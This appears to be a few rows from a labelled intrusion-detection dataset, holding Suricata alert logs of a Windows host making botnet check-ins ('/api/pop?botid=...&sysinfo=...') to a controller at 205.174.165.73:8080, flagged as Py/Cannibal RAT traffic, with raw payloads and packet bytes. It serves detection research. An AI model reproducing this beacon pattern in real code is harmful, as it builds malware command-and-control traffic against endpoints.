[{'timestamp': '2017-07-07T13:23:40.223056+0000', 'flow_id': 583319026415710, 'pcap_cnt': 4421916, 'event_type': 'alert', 'src_ip': '192.168.10.15', 'src_port': 52248, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': '00:1e:4f:d4:ca:28', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2812028, 'rev': 3, 'signature': 'ETPRO POLICY Python Requests Suspicious User Agent', 'category': 'Potential Corporate Privacy Violation', 'severity': 1, 'metadata': {'created_at': ['2015_07_16'], 'updated_at': ['2020_08_17']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc4&sysinfo=Windows%2010', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 435, 'bytes_toclient': 308, 'start': '2017-07-07T13:23:40.145502+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzQmc3lzaW5mbz1XaW5kb3dzJTIwMTAgSFRUUC8xLjENCkhvc3Q6IDIwNS4xNzQuMTY1LjczOjgwODANCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KQWNjZXB0OiAqLyoNClVzZXItQWdlbnQ6IHB5dGhvbi1yZXF1ZXN0cy8yLjE0LjINCg0K', 'payload_printable': 'GET /api/pop?botid=mitacs-pc4&sysinfo=Windows%2010 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxAB5P1MooCABFAAAobm5AAIAGTrLAqAoPza6lScwYH5D4wlOOeW3M5FARAQDy1wAAAAAAAAAA', 'packet_info': {'linktype': 1}}, {'timestamp': '2017-07-07T13:23:40.223056+0000', 'flow_id': 583319026415710, 'pcap_cnt': 4421916, 'event_type': 'alert', 'src_ip': '192.168.10.15', 'src_port': 52248, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': '00:1e:4f:d4:ca:28', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2829850, 'rev': 2, 'signature': 'ETPRO TROJAN Py/Cannibal RAT Checkin M1', 'category': 'A Network Trojan was Detected', 'severity': 1, 'metadata': {'affected_product': ['Windows_XP_Vista_7_8_10_Server_32_64_Bit'], 'attack_target': ['Client_Endpoint'], 'created_at': ['2018_03_01'], 'deployment': ['Perimeter'], 'former_category': ['MALWARE'], 'malware_family': ['Cannibal'], 'performance_impact': ['Moderate'], 'signature_severity': ['Major'], 'tag': ['RAT'], 'updated_at': ['2020_08_24']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc4&sysinfo=Windows%2010', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 435, 'bytes_toclient': 308, 'start': '2017-07-07T13:23:40.145502+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzQmc3lzaW5mbz1XaW5kb3dzJTIwMTAgSFRUUC8xLjENCkhvc3Q6IDIwNS4xNzQuMTY1LjczOjgwODANCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KQWNjZXB0OiAqLyoNClVzZXItQWdlbnQ6IHB5dGhvbi1yZXF1ZXN0cy8yLjE0LjINCg0K', 'payload_printable': 'GET /api/pop?botid=mitacs-pc4&sysinfo=Windows%2010 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxAB5P1MooCABFAAAobm5AAIAGTrLAqAoPza6lScwYH5D4wlOOeW3M5FARAQDy1wAAAAAAAAAA', 'packet_info': {'linktype': 1}}]
308
attack
1,247,016
192.168.10.15-52250-205.174.165.73-8080-6
['flow', 'http']
event_type: flow, proto: TCP, app_proto: http, flow_pkts_toserver: 5, flow_pkts_toclient: 4, flow_bytes_toserver: 495, flow_bytes_toclient: 368, flow_age: 0, flow_state: closed, flow_reason: timeout, metadata_flowbits_0: http.dottedquadhost, tcp_tcp_flags: 1b, tcp_tcp_flags_ts: 1b, tcp_tcp_flags_tc: 1b, tcp_syn: True, tcp_fin: True, tcp_psh: True, tcp_ack: True, tcp_state: closed ; pcap_cnt: 4427792, event_type: http, proto: TCP, tx_id: 0, metadata_flowbits_0: http.dottedquadhost, http_hostname: 205.174.165.73, http_http_port: 8080, http_url: /api/pop?botid=mitacs-pc4&sysinfo=Windows%2010, http_http_user_agent: python-requests/2.14.2, http_http_content_type: text/html, http_http_method: GET, http_protocol: HTTP/1.1, http_status: 200, http_length: 0
true
Botnet
true
13:23:50
75,614
Friday
[{'timestamp': '2017-07-07T13:23:50.298513+0000', 'flow_id': 1724964284033460, 'pcap_cnt': 4427792, 'event_type': 'alert', 'src_ip': '192.168.10.15', 'src_port': 52250, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': '00:1e:4f:d4:ca:28', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2812028, 'rev': 3, 'signature': 'ETPRO POLICY Python Requests Suspicious User Agent', 'category': 'Potential Corporate Privacy Violation', 'severity': 1, 'metadata': {'created_at': ['2015_07_16'], 'updated_at': ['2020_08_17']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc4&sysinfo=Windows%2010', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 435, 'bytes_toclient': 308, 'start': '2017-07-07T13:23:50.223668+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzQmc3lzaW5mbz1XaW5kb3dzJTIwMTAgSFRUUC8xLjENCkhvc3Q6IDIwNS4xNzQuMTY1LjczOjgwODANCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KQWNjZXB0OiAqLyoNClVzZXItQWdlbnQ6IHB5dGhvbi1yZXF1ZXN0cy8yLjE0LjINCg0K', 'payload_printable': 'GET /api/pop?botid=mitacs-pc4&sysinfo=Windows%2010 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxAB5P1MooCABFAAAobnNAAIAGTq3AqAoPza6lScwaH5ABfkzQMif9/1ARAQAHBAAAAAAAAAAA', 'packet_info': {'linktype': 1}}, {'timestamp': '2017-07-07T13:23:50.298513+0000', 'flow_id': 1724964284033460, 'pcap_cnt': 4427792, 'event_type': 'alert', 'src_ip': '192.168.10.15', 'src_port': 52250, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': '00:1e:4f:d4:ca:28', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2829850, 'rev': 2, 'signature': 'ETPRO TROJAN Py/Cannibal RAT Checkin M1', 'category': 'A Network Trojan was Detected', 'severity': 1, 'metadata': {'affected_product': ['Windows_XP_Vista_7_8_10_Server_32_64_Bit'], 'attack_target': ['Client_Endpoint'], 'created_at': ['2018_03_01'], 'deployment': ['Perimeter'], 'former_category': ['MALWARE'], 'malware_family': ['Cannibal'], 'performance_impact': ['Moderate'], 'signature_severity': ['Major'], 'tag': ['RAT'], 'updated_at': ['2020_08_24']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc4&sysinfo=Windows%2010', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 435, 'bytes_toclient': 308, 'start': '2017-07-07T13:23:50.223668+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzQmc3lzaW5mbz1XaW5kb3dzJTIwMTAgSFRUUC8xLjENCkhvc3Q6IDIwNS4xNzQuMTY1LjczOjgwODANCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KQWNjZXB0OiAqLyoNClVzZXItQWdlbnQ6IHB5dGhvbi1yZXF1ZXN0cy8yLjE0LjINCg0K', 'payload_printable': 'GET /api/pop?botid=mitacs-pc4&sysinfo=Windows%2010 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxAB5P1MooCABFAAAobnNAAIAGTq3AqAoPza6lScwaH5ABfkzQMif9/1ARAQAHBAAAAAAAAAAA', 'packet_info': {'linktype': 1}}]
307
attack
1,247,352